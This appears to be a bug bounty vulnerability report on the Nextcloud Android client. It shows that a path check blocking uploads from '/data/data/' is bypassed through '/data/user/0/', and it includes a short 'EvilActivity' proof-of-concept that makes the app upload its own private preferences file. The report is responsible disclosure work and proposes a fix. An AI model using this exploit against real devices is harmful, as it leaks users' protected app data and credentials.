The Android client of nextcloud (com.nextcloud.client) allows arbitrary file including protected/private files to be leaked through the file upload functionality.
A report 1142918 has been submitted for the vulnerability of leaking arbitrary protected files. NextCloud added a fix on May 18, 2021, which added a check to the class src/main/java/com/owncloud/android/files/services/FileUploader.java:
if (file.getStoragePath().startsWith("/data/data/")) {
Log_OC.d(TAG, "Upload from sensitive path is not allowed");
return;
}
The fix checks whether a file to be uploaded has a path starting with “/data/data”. However, the check is not sufficient. We can easily bypass this check using the path “/data/user/0/” e.g. “/data/user/0/com.nextcloud.client/”. A program to exploit this vulnerability can be:
public class EvilActivity extends AppCompatActivity {
private static final String LOG_TAG = EvilActivity.class.getName();
final static String PRIVATE_URI = "file:///data/user/0/com.nextcloud.client/shared_prefs/com.nextcloud.client_preferences.xml";
@Override
protected void onCreate(@Nullable Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
Log.d("heen", "EvilActivity started!");
setResult(-1, new Intent().setData(Uri.parse(PRIVATE_URI)));
finish();
}
}
A working POC is as follows:
A sample screenshot with protected files uploaded and their content is:
{F1523976}
{F1523979}
Arbitrary sensitive file of the nextcloud android client can be leaked. To address this issue, disallow any file whose path has the package name but isn’t in the temp or cache folder of nextcloud.
Please investigate. Thanks.